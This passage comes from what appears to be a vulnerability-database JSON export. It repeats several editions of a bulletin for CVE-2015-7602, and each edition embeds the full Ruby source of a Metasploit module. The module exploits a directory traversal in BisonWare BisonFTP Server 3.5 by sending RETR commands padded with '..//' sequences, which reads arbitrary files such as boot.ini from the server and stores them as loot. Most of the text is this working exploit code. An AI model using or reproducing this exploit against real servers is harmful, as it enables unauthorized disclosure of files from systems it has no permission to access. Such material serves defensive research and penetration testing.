This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-09T17:03:32", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-09T19:01:19", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-09T19:01:19", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-11T01:04:59", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-11T01:04:59", "differentElements": ["modified", "published"], "edition": 28}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-11T05:04:18", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-11T05:04:18", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-29T23:50:53", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-29T23:50:53", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-30T01:47:53", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-30T01:47:53", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-06-04T13:48:05", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-06-04T13:48:05", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
